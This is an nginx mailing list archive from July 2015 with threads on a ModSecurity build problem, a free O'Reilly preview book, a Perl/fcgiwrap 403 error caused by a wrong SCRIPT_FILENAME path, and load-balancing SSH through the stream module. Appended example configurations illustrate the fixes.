From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Jul 2015 23:39:26 +0300 Subject: does it normal? In-Reply-To: <53f8e589ded7fe4f00686da747106020.NginxMailingListEnglish@forum.nginx.org> References: <20150730173143.GX19190@mdounin.ru> <53f8e589ded7fe4f00686da747106020.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150730203926.GD19190@mdounin.ru> Hello! On Thu, Jul 30, 2015 at 04:11:52PM -0400, evgeni22 wrote: > nginx version: nginx/1.8.0 > built by gcc 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) > built with OpenSSL 1.0.1e-fips 11 Feb 2013 > TLS SNI support enabled > configure arguments: > --add-module=../modsecurity_nginx-2.8.0/nginx/modsecurity --user=nginx > --group=nginx --prefix=/usr --sbin-path=/usr/sbin > --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid > --http-log-path=/var/log/nginx/access_log > --error-log-path=/var/log/nginx/error_log --with-ipv6 > --without-mail_imap_module --without-mail_smtp_module --with-http_ssl_module > --with-http_realip_module --with-http_stub_status_module > --with-http_gzip_static_module --with-http_dav_module --with-cc-opt=''-D > FD_SETSIZE=32768'' > > CentOS Linux release 7.1.1503 > > error.log > 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity for nginx (STABLE)/2.8.0 > (http://www.modsecurity.org/) configured. > 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: APR compiled > version="1.5.1"; loaded version="1.5.1" > 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: PCRE compiled > version="8.20 "; loaded version="8.20 2011-10-21" > 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: LIBXML compiled > version="2.9.2" > 2015/07/30 09:34:28 [notice] 12683#0: Original server signature: ModSecurity > Standalone > 2015/07/30 09:34:28 [notice] 12683#0: Status engine is currently disabled, > enable it by set SecStatusEngine to On. [...] > So what do i start with to find the problem? First of all, recompile nginx without ModSecurity. 
-- Maxim Dounin http://nginx.org/
From sarah at nginx.com Thu Jul 30 20:40:39 2015
From: sarah at nginx.com (Sarah Novotny)
Date: Thu, 30 Jul 2015 13:40:39 -0700
Subject: Re: Free O’Reilly animal book about nginx
In-Reply-To: <55BA8510.5020702@lucee.org>
References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> <55BA8510.5020702@lucee.org>
Message-ID: <1FFF5F2B-FB8B-495C-B4AA-1CA6E0544A13@nginx.com>

> On Jul 30, 2015, at 1:12 PM, Igal @ Lucee.org wrote:
>
> this is awesome news! congrats!!!
>
> the download link is broken though (404).

It’s been fixed :)

sarah
From shahzaib.cb at gmail.com Thu Jul 30 20:51:15 2015
From: shahzaib.cb at gmail.com (shahzaib shahzaib)
Date: Fri, 31 Jul 2015 01:51:15 +0500
Subject: Re: Free O’Reilly animal book about nginx
In-Reply-To: <1FFF5F2B-FB8B-495C-B4AA-1CA6E0544A13@nginx.com>
References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> <55BA8510.5020702@lucee.org> <1FFF5F2B-FB8B-495C-B4AA-1CA6E0544A13@nginx.com>
Message-ID:

Whoops, http://prntscr.com/7yzccl

That's great btw :)

On Fri, Jul 31, 2015 at 1:40 AM, Sarah Novotny wrote:
>
> On Jul 30, 2015, at 1:12 PM, Igal @ Lucee.org wrote:
>
> this is awesome news! congrats!!!
>
> the download link is broken though (404).
>
>
> It’s been fixed :)
>
> sarah
From al-nginx at none.at Thu Jul 30 21:13:24 2015
From: al-nginx at none.at (Aleksandar Lazic)
Date: Thu, 30 Jul 2015 23:13:24 +0200
Subject: Re: Free O’Reilly animal book about nginx
In-Reply-To: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>
References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>
Message-ID: <3ef73479336715f2aadc77c53e6dd5b4@none.at>

Hi Igor.

On 30-07-2015 21:34, Igor Sysoev wrote:
>>
>> Nearly 20 years ago I read my first O’Reilly book, Learning Perl.
>> Back then I never would have dreamed O’Reilly would someday publish
>> a book written about the software I created, yet here we are today.
>>
>> I am honored to announce that later this year O’Reilly Media will
>> publish one of their iconic animal books entitled
>> nginx: A Practical Guide to High Performance,
>> and I’m delighted to offer you a preview edition download today [1].

Congratulations.

When I think back ~10 Years ago I'm sure you have not thought that nginx could be THAT popular, haven't you ;-).

Thank you that you have started to create nginx.

Best regards
Aleks
From nginx-forum at nginx.us Thu Jul 30 23:44:28 2015
From: nginx-forum at nginx.us (George)
Date: Thu, 30 Jul 2015 19:44:28 -0400
Subject: Re: Free O’Reilly animal book about nginx
In-Reply-To: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>
References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>
Message-ID: <8aae2aaa95bccfa3cf56a8368ab4eef8.NginxMailingListEnglish@forum.nginx.org>

thanks Igor and Nginx !

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260658,260666#msg-260666
From lists at ruby-forum.com Fri Jul 31 01:37:04 2015
From edigarov at qarea.com Fri Jul 31 08:07:55 2015 
From: edigarov at qarea.com (Gregory Edigarov)
Date: Fri, 31 Jul 2015 11:07:55 +0300
Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?=
In-Reply-To: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>
References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru>
Message-ID: <55BB2CDB.1060902@qarea.com>

On 07/30/2015 10:34 PM, Igor Sysoev wrote:
>
> Nearly 20 years ago I read my first O'Reilly book, Learning Perl.
> Back then I never would have dreamed O'Reilly would someday publish
> a book written about the software I created, yet here we are today.
>
>
> I am honored to announce that later this year O'Reilly Media will
> publish one of their iconic animal books entitled
> nginx: A Practical Guide to High Performance,
> and I'm delighted to offer you a preview edition download today.
> This five chapter preview covers:
>
>
>   * How to install nginx
>
>   * How to use nginx as a software load balancer
>
>   * How to set up nginx as a reverse proxy for serving dynamic web
>     applications
>
>   * How to tune nginx for optimal performance and security
>
>   * And more!
>
>
> I hope you enjoy the book.
>
Thank you, but the download doesn't start on my Firefox.

From maxim at nginx.com Fri Jul 31 08:18:10 2015
From: maxim at nginx.com (Maxim Konovalov)
Date: Fri, 31 Jul 2015 11:18:10 +0300
Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?=
In-Reply-To: <55BB2CDB.1060902@qarea.com>
References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> <55BB2CDB.1060902@qarea.com>
Message-ID: <55BB2F42.8070907@nginx.com>

Hi,

[...]
> Thank you, but the download doesn't start on my Firefox.
>
Check your mailbox instead. You should receive a link to the preview.

--
Maxim Konovalov
http://nginx.com

From mark.mielke at gmail.com Fri Jul 31 08:52:10 2015
From: mark.mielke at gmail.com (Mark Mielke)
Date: Fri, 31 Jul 2015 04:52:10 -0400
Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?=
In-Reply-To: <55BB2F42.8070907@nginx.com>
References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> <55BB2CDB.1060902@qarea.com> <55BB2F42.8070907@nginx.com>
Message-ID:

I requested it a few days ago. It was a little confusing. The link was
circular... You get a link to request a copy which gets you a link to
request a copy. But the email had a pdf attachment and that was the book
if I recall correctly...

I really like nginx and the thinking of the people behind it. Thank you!

On Jul 31, 2015 4:18 AM, "Maxim Konovalov" wrote:

> Hi,
>
> [...]
> > Thank you, but the download doesn't start on my Firefox.
> >
> Check your mailbox instead. You should receive a link to the preview.
>
> --
> Maxim Konovalov
> http://nginx.com
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>

From nginx-forum at nginx.us Fri Jul 31 12:55:44 2015
From: nginx-forum at nginx.us (youradds)
Date: Fri, 31 Jul 2015 08:55:44 -0400
Subject: Perl + fcgi + nginx - what am I doing wrong?
Message-ID: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org>

Hi,

I've already got a live + dev site running under nginx and perl (with fcgi),
but I can't for the life of me work out why it's not working this time
around. I've setup a new dev server. I won't bore you with all of the
details, but suffice to say I have installed (via apt-get);

    sudo apt-get update && sudo apt-get upgrade
    sudo apt-get install nginx
    sudo apt-get install php5-cli php5-cgi spawn-fcgi php-pear
    sudo apt-get install mysql-server php5-mysql
    sudo apt-get install fcgiwrap

The OS is Debian 8.1.

I have then configured my site, using:

    server {

        listen 80;

        server_name site.net.net www.site.net.net;
        access_log /srv/www/site.net.net/logs/access.log;
        error_log /srv/www/site.net.net/logs/error.log;
        root /srv/www/site.net.net/www;

        location / {
            index index.html index.htm;
        }

        location ~ \.php$ {
            try_files $uri =404;
            include /etc/nginx/fastcgi_params;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www$fastcgi_script_name;
        }

        location ~ \.cgi$ {
            try_files $uri =404;
            gzip off;
            include /etc/nginx/fastcgi_params;
            fastcgi_pass unix:/var/run/fcgiwrap.socket;
            fastcgi_index index.cgi;
            fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www/cgi-bin/$fastcgi_script_name;
        }

    }

I've sym-linked the config files into sites-enabled, so that it's visible on
nginx. I then rebooted nginx, and tried:

    index.html - works fine
    index.php - works fine
    index.cgi - 403 error

I managed to fumble my way through it last time, but I can't figure out what
I did different (I know it was a real pig to get configured the first time
around)

Any suggestions from the experts?

(apologies for the formatting of this post - can't figure out how to do
markup?)

TIA

Andy

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260678#msg-260678

From nginx-forum at nginx.us Fri Jul 31 14:55:10 2015
From: nginx-forum at nginx.us (youradds)
Date: Fri, 31 Jul 2015 10:55:10 -0400
Subject: Perl + fcgi + nginx - what am I doing wrong?
In-Reply-To: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org>
References: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <50a2307d24fd239427715cd17d0a0c2c.NginxMailingListEnglish@forum.nginx.org>

FWIW - this is what I get when I run it via SSH:

    root at server:/var/run# perl /srv/www/site.net/www/index.pl
    Content-Type: text/html

    FOO

...yet I get a 403 in the browser (and nothing in the site error_log)

TIA

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260681#msg-260681

From francis at daoine.org Fri Jul 31 16:00:40 2015
From: francis at daoine.org (Francis Daly)
Date: Fri, 31 Jul 2015 17:00:40 +0100
Subject: Perl + fcgi + nginx - what am I doing wrong?
In-Reply-To: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org>
References: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150731160040.GB23844@daoine.org>

On Fri, Jul 31, 2015 at 08:55:44AM -0400, youradds wrote:

Hi there,

> I've already got a live + dev site running under nginx and perl (with fcgi),
> but I can't for the life of me work out why it's not working this time
> around.

What is shown when you "diff" the working old nginx.conf and the failing
new nginx.conf?

Do the old and new use the same fastcgi server? Are there any differences
in the fastcgi server config?

>     location ~ \.cgi$ {
>         try_files $uri =404;
>         gzip off;
>         include /etc/nginx/fastcgi_params;
>         fastcgi_pass unix:/var/run/fcgiwrap.socket;
>         fastcgi_index index.cgi;
>         fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www/cgi-bin/$fastcgi_script_name;
>     }

> index.html - works fine
> index.php - works fine
> index.cgi - 403 error

What file on your filesystem do you want the fastcgi server to process
when you request this index.cgi? -- your server layout.

What SCRIPT_FILENAME value(s) does nginx send to your fastcgi server? --
nginx debug logs, or watch the traffic.

(Does your fastcgi server even use SCRIPT_FILENAME? -- your fastcgi
server documentation.)

Is SCRIPT_FILENAME set in your /etc/nginx/fastcgi_params?

	f
--
Francis Daly        francis at daoine.org

From jwyman at taos.com Fri Jul 31 17:05:22 2015
From: jwyman at taos.com (Jerry Wyman)
Date: Fri, 31 Jul 2015 17:05:22 +0000
Subject: ssh load-balancing
Message-ID:

Hi,

I'm new to nginx and am trying to load-balance ssh sessions to an
autoscaling group of ECS instances in AWS.

Having trouble getting my config files right. I don't get any errors on
startup, but my access.logs shows these lines for each attempt and the
command line gives me this:

ssh ec2-user at 10.172.60.7

ssh_exchange_identification: Connection closed by remote host

Access.log:

10.172.200.18 - - [31/Jul/2015:15:54:15 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-"

10.172.200.18 - - [31/Jul/2015:16:25:31 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-"

10.172.200.18 - - [31/Jul/2015:16:34:31 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-"

Any direction would be appreciated.

Thanks,
Jerry

Jerome (Jerry) Wyman
Technical Consultant
(207) 751-6613
Jwyman at taos.com

This communication is Confidential Information. By using this message and
attachments you implicitly consent to terms and conditions set forth at
http://www.taos.com/email_disclaimer. If you do not consent or received
this message in error, please destroy it.

From nginx-forum at nginx.us Fri Jul 31 17:51:25 2015
From: nginx-forum at nginx.us (youradds)
Date: Fri, 31 Jul 2015 13:51:25 -0400
Subject: Perl + fcgi + nginx - what am I doing wrong?
In-Reply-To: <20150731160040.GB23844@daoine.org>
References: <20150731160040.GB23844@daoine.org>
Message-ID: <5579fe6bfcff7bf08570ba3c8bbe0fb9.NginxMailingListEnglish@forum.nginx.org>

Hi Francis,

Thanks for the reply!

> What is shown when you "diff" the working old nginx.conf and the failing
> new nginx.conf?

Not a huge amount tbh. The live one has:

    pid /var/run/nginx.pid;

and new dev has:

    pid /run/nginx.pid;

New one has:

    ##
    # SSL Settings
    ##

    ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
    ssl_prefer_server_ciphers on;

..extra.

..and the old one has this extra (all commented out, mind);

    # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript;

    ##
    # nginx-naxsi config
    ##
    # Uncomment it if you installed nginx-naxsi
    ##

    #include /etc/nginx/naxsi_core.rules;

    ##
    # nginx-passenger config
    ##
    # Uncomment it if you installed nginx-passenger
    ##

    #passenger_root /usr;
    #passenger_ruby /usr/bin/ruby;

> Do the old and new use the same fastcgi server? Are there any differences
> in the fastcgi server config?

Both the same by the looks of it:

    root at steamdev2:~# service fastcgi --version
    service ver. 0.91-ubuntu1

    root at steampunkjlinode:~# service fastcgi --version
    service ver. 0.91-ubuntu1

> Do the old and new use the same fastcgi server? Are there any differences
> in the fastcgi server config?

Do you mean the etc/init.d/fcgiwrap file? There were a few differences in it
(mostly comments). I tried copying the same one over from live, but didn't
seem to make a difference

> What file on your filesystem do you want the fastcgi server to process
> when you request this index.cgi? -- your server layout.

The layout is:

    /srv/www/site.net/logs/
    /srv/www/site.net/www/
    /srv/www/site.net/www/cgi-bin

The .cgi/.pl stuff is all going to be in /cgi-bin - but for testing
purposes, I've just stuck it at root level (so I can try out and see if I
can get it working at the most basic level)

The script in question would be found /srv/www/site.net/www/index.cgi, and I
would expect it to work/run at http://site.net/index.cgi

With regards to /etc/nginx/fastcgi_params settings - here are the values of
them:

LIVE (working) ONE: http://pastebin.com/QMHKGkJX
NEW ONE: http://pastebin.com/G72Ds9aA

Hopefully that answers everything :)

Cheers

Andy

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260684#msg-260684

From mdounin at mdounin.ru Fri Jul 31 17:53:29 2015
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Fri, 31 Jul 2015 20:53:29 +0300
Subject: ssh load-balancing
In-Reply-To:
References:
Message-ID: <20150731175329.GG19190@mdounin.ru>

Hello!

On Fri, Jul 31, 2015 at 05:05:22PM +0000, Jerry Wyman wrote:

> I'm new to nginx and am trying to load-balance ssh sessions to
> an autoscaling group of ECS instances in AWS.
>
> Having trouble getting my config files right. I don't get any
> errors on startup, but my access.logs shows these lines for each
> attempt and the command line gives me this:
>
> ssh ec2-user at 10.172.60.7
>
> ssh_exchange_identification: Connection closed by remote host
>
> Access.log:
>
> 10.172.200.18 - - [31/Jul/2015:15:54:15 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-"
>
> 10.172.200.18 - - [31/Jul/2015:16:25:31 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-"
>
> 10.172.200.18 - - [31/Jul/2015:16:34:31 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-"
>
> Any direction would be appreciated.

Looks like you are trying to balance ssh connections using http module.
This won't work, as http is only able to balance http requests,
not arbitrary connections.

If you want to balance ssh connections, try using the stream
module instead:

http://nginx.org/en/docs/stream/ngx_stream_core_module.html
https://www.nginx.com/resources/admin-guide/tcp-load-balancing/

The stream module is designed to balance arbitrary connections,
and should work for you.

> This communication is Confidential Information. By using this
> message and attachments you implicitly consent to terms and
> conditions set forth at http://www.taos.com/email_disclaimer. If
> you do not consent or received this message in error, please
> destroy it.

By posting to this list you've agreed that the message will be
publicly available. If you want your messages to be confidential,
please consider using commercial support, see
https://www.nginx.com/support/.

--
Maxim Dounin
http://nginx.org/

From zipper1790 at gmail.com Fri Jul 31 18:18:25 2015
From: zipper1790 at gmail.com (Erick Ocrospoma)
Date: Fri, 31 Jul 2015 13:18:25 -0500
Subject: Perl + fcgi + nginx - what am I doing wrong?
In-Reply-To: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org>
References: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

Hi,

On 31 July 2015 at 07:55, youradds wrote:

> Hi,
>
> I've already got a live + dev site running under nginx and perl (with
> fcgi),
> but I can't for the life of me work out why it's not working this time
> around. I've setup a new dev server. I won't bore you with all of the
> details, but suffice to say I have installed (via apt-get);
>
>     sudo apt-get update && sudo apt-get upgrade
>     sudo apt-get install nginx
>     sudo apt-get install php5-cli php5-cgi spawn-fcgi php-pear
>     sudo apt-get install mysql-server php5-mysql
>     sudo apt-get install fcgiwrap
>
> The OS is Debian 8.1.
>
> I have then configured my site, using:
>
>     server {
>
>         listen 80;
>
>         server_name site.net.net www.site.net.net;
>         access_log /srv/www/site.net.net/logs/access.log;
>         error_log /srv/www/site.net.net/logs/error.log;
>         root /srv/www/site.net.net/www;
>
>         location / {
>             index index.html index.htm;
>         }
>
>         location ~ \.php$ {
>             try_files $uri =404;
>             include /etc/nginx/fastcgi_params;
>             fastcgi_pass 127.0.0.1:9000;
>             fastcgi_index index.php;
>             fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www$fastcgi_script_name;
>         }
>
>         location ~ \.cgi$ {
>             try_files $uri =404;
>             gzip off;
>             include /etc/nginx/fastcgi_params;
>             fastcgi_pass unix:/var/run/fcgiwrap.socket;
>             fastcgi_index index.cgi;
>             fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www/cgi-bin/$fastcgi_script_name;
>         }
>

AFAIK, path before $fastcgi_script_name should not end with /

Log didn't say anything in particular? Where does the error 403 come from?
403 means forbidden, perhaps socket which you are running has not been
started with same permissions as Nginx does/can.

Running fcgi manually through that socket could bring you more clues about
what's happening/wrong with the communication between Nginx and fcgi

>     }
>
> I've sym-linked the config files into sites-enabled, so that it's visible on
> nginx. I then rebooted nginx, and tried:
>
> index.html - works fine
> index.php - works fine
> index.cgi - 403 error
>
> I managed to fumble my way through it last time, but I can't figure out
> what
> I did different (I know it was a real pig to get configured the first time
> around)
>
> Any suggestions from the experts?
>
> (apologies for the formatting of this post - can't figure out how to do
> markup?)
>
> TIA
>
> Andy
>
> Posted at Nginx Forum:
> http://forum.nginx.org/read.php?2,260678,260678#msg-260678
>

--
~ Happy install !

Erick.

---
IRC : zerick
Blog : http://zerick.me
About : http://about.me/zerick
Linux User ID : 549567

From nginx-forum at nginx.us Fri Jul 31 18:55:02 2015
From: nginx-forum at nginx.us (youradds)
Date: Fri, 31 Jul 2015 14:55:02 -0400
Subject: Perl + fcgi + nginx - what am I doing wrong?
In-Reply-To:
References:
Message-ID: <697cd58870939011b5f7d175573d35a4.NginxMailingListEnglish@forum.nginx.org>

Hi,

Aaaaah now I feel like a total muppet!

I had:

    fastcgi_param SCRIPT_FILENAME /srv/www/site.net/www/cgi-bin/$fastcgi_script_name;

but it wasn't in the cgi-bin!!!! It should have been:

    fastcgi_param SCRIPT_FILENAME /srv/www/site.net/www/$fastcgi_script_name;

Reboot it, and it works fine now. That'd be why it was 403'ing... as it
couldn't find the file. Duh!

Thanks for sticking through this with me. I've been battling that for hours.
Always so simple when you know the answer ;)

Cheers

Andy

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260687#msg-260687

From nginx-forum at nginx.us Fri Jul 31 18:59:34 2015
From: nginx-forum at nginx.us (youradds)
Date: Fri, 31 Jul 2015 14:59:34 -0400
Subject: Perl + fcgi + nginx - what am I doing wrong?
In-Reply-To:
References:
Message-ID:

haha yup - that was it! Just tweaked the config for it, and it works
perfectly. Still got some fun and games to do with the modules that need
installing - but at least I can finally access it from the browser, to test
it all.

Thanks again!

Andy

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260688#msg-260688

From maxim at nginx.com Fri Jul 31 19:27:07 2015
From: maxim at nginx.com (Maxim Konovalov)
Date: Fri, 31 Jul 2015 22:27:07 +0300
Subject: ssh load-balancing
In-Reply-To:
References:
Message-ID: <55BBCC0B.7080607@nginx.com>

On 7/31/15 8:05 PM, Jerry Wyman wrote:
> Hi,
>
> I'm new to nginx and am trying to load-balance ssh sessions to an
> autoscaling group of ECS instances in AWS.
>
[...]

Just curious: is it just a test or a real use-case? Why does
anybody want to load-balance ssh?

--
Maxim Konovalov
http://nginx.com

From francis at daoine.org Fri Jul 31 22:23:24 2015
From: francis at daoine.org (Francis Daly)
Date: Fri, 31 Jul 2015 23:23:24 +0100
Subject: Perl + fcgi + nginx - what am I doing wrong?
In-Reply-To: <697cd58870939011b5f7d175573d35a4.NginxMailingListEnglish@forum.nginx.org>
References: <697cd58870939011b5f7d175573d35a4.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150731222324.GC23844@daoine.org>

On Fri, Jul 31, 2015 at 02:55:02PM -0400, youradds wrote:

Hi there,

Good that you found and fixed the problem.

> I had:
>
>     fastcgi_param SCRIPT_FILENAME /srv/www/site.net/www/cgi-bin/$fastcgi_script_name;
>
> but it wasn't in the cgi-bin!!!! It should have been:
>
>     fastcgi_param SCRIPT_FILENAME /srv/www/site.net/www/$fastcgi_script_name;
>
> Reboot it, and it works fine now. That'd be why it was 403'ing... as it
> couldn't find the file. Duh!

Note, you have

    try_files $uri =404;
    fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www/cgi-bin/$fastcgi_script_name;

The first line says "return 404 unless the file $document_root$uri
exists". In general, if the second line does not also refer to exactly
the filename $document_root$uri, you should suspect a problem.

(It can validly refer to a different filename, but probably only where
the fastcgi server is inside a chroot area.)

When you come to use the cgi-bin directory, you'll want to be aware
of that.

Cheers,

	f
--
Francis Daly        francis at daoine.org

From nginx-forum at nginx.us Fri Jul 31 22:30:06 2015
From: nginx-forum at nginx.us (jerrywyman)
Date: Fri, 31 Jul 2015 18:30:06 -0400
Subject: ssh load-balancing
In-Reply-To: <20150731175329.GG19190@mdounin.ru>
References: <20150731175329.GG19190@mdounin.ru>
Message-ID:

Thanks Maxim,

I'll give that a try.

Much appreciated,

Jerry

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260683,260691#msg-260691
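
The try_files / SCRIPT_FILENAME rule Francis Daly describes in the "Perl + fcgi + nginx" thread, written out as a server block. This is an added example, not configuration posted by anyone on the list; the paths follow the layout Andy gave, and limiting execution to /cgi-bin/ is an assumption about where the scripts will finally live.

```nginx
# Added example (not from the thread). Belongs inside the http {} block.
server {
    listen 80;
    server_name site.net;
    root /srv/www/site.net/www;

    # BEFORE (shape of the posted config, kept as a comment):
    #
    #   location ~ \.cgi$ {
    #       try_files $uri =404;
    #       include /etc/nginx/fastcgi_params;
    #       fastcgi_pass unix:/var/run/fcgiwrap.socket;
    #       fastcgi_param SCRIPT_FILENAME /srv/www/site.net/www/cgi-bin/$fastcgi_script_name;
    #   }
    #
    # For a request to /index.cgi, try_files tests
    #   $document_root$uri   = /srv/www/site.net/www/index.cgi
    # while the FastCGI server is told to run
    #   SCRIPT_FILENAME      = /srv/www/site.net/www/cgi-bin//index.cgi
    # so the file that was checked is not the file that is executed.

    # AFTER: build SCRIPT_FILENAME from the same pieces try_files uses.
    # A request to /cgi-bin/report.cgi is checked and executed as
    #   /srv/www/site.net/www/cgi-bin/report.cgi
    location ~ ^/cgi-bin/.+\.cgi$ {
        try_files $uri =404;
        gzip off;
        include /etc/nginx/fastcgi_params;
        fastcgi_pass unix:/var/run/fcgiwrap.socket;
        # If the included fastcgi_params file also sets SCRIPT_FILENAME,
        # both values are sent and the FastCGI server decides which one
        # it honours, so keep a single definition.
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }

    # Regex locations are tried in the order written, so this one only
    # sees .cgi requests outside /cgi-bin/. They are neither executed
    # nor returned as source text.
    location ~ \.cgi$ {
        return 404;
    }

    location / {
        index index.html index.htm;
    }
}
```

Checking the result with `nginx -t` and one request per location (inside and outside /cgi-bin/) confirms that only the intended directory reaches fcgiwrap.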
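
The stream-module setup Maxim Dounin points to in the "ssh load-balancing" thread, as an added example that is not from the thread. The backend addresses, the listen port 2222 and the timeout values are constructed; nginx has to be built with --with-stream for the stream {} block to be accepted.

```nginx
# Added example (not from the thread). Goes at the top level of
# nginx.conf, beside the http {} block, never inside it: the http
# module parses the SSH banner "SSH-2.0-OpenSSH_6.2" as a request
# line and answers 400, which is what the posted access log shows.
stream {
    upstream ssh_pool {
        # Keep each client address on the same backend. Every sshd has
        # its own host key unless the pool shares one, so a client that
        # lands on a different backend sees a host key mismatch.
        hash $remote_addr consistent;

        # Constructed addresses. A backend is skipped for 15s after
        # 2 failed connection attempts.
        server 10.0.1.11:22 max_fails=2 fail_timeout=15s;
        server 10.0.1.12:22 max_fails=2 fail_timeout=15s;
    }

    server {
        # Constructed port; leaves the proxy host's own sshd on 22.
        listen 2222;

        proxy_pass ssh_pool;

        # Fail fast when a backend does not accept the TCP connection.
        proxy_connect_timeout 5s;

        # Idle time allowed on an established session before nginx
        # closes it; interactive shells need this well above the default.
        proxy_timeout 30m;
    }
}
```

The backends see every session arriving from the proxy's address, so sshd logs and any address-based rules on them (rate limits, ban lists, `from=` restrictions in authorized_keys) no longer reflect the real client and need to be applied at the proxy or its security group instead.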